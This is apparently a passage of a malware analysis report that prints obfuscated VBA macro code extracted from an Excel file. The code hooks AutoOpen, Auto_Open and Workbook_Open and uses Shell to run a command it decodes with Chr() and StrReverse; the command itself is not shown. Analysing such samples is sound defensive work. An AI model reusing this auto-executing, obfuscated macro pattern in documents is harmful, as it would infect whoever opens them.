27) + Chr(80 + 20 - 20)) + Chr(92) & kaXbtWhUKBZHLV If NPQMMuHNGqHNP = "aInMJhEKnvhmoE" Then qnUavRMYnudjhr = "ljfVWWzaezYpnV" End If OiXncuuRYeqqSB = "sgWehQXXZiyXEV" waNCSMPXkoMPVF = "uGrYXOLxRwdTuw" uYfIQORnSxJpkm VfShullmLEqBzN, IdqbMkbajbpny Call Shell(IdqbMkbajbpny, vbNormalFocus) End Sub Sub AutoOpen() oncSETPgyuUcvK End Sub Sub Auto_Open() oncSETPgyuUcvK End Sub Private Function pTTbNWEDYVEMH(UJCggrLvWeoJIH) JbVUODfocOImvm = EXgQpHSqTTDsBQ pTTbNWEDYVEMH = StrReverse(UJCggrLvWeoJIH) If JbVUODfocOImvm = EXgQpHSqTTDsBQ Then EXgQpHSqTTDsBQ = aOjsxlVlUYDKnL End Function Sub Workbook_Open() oncSETPgyuUcvK End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.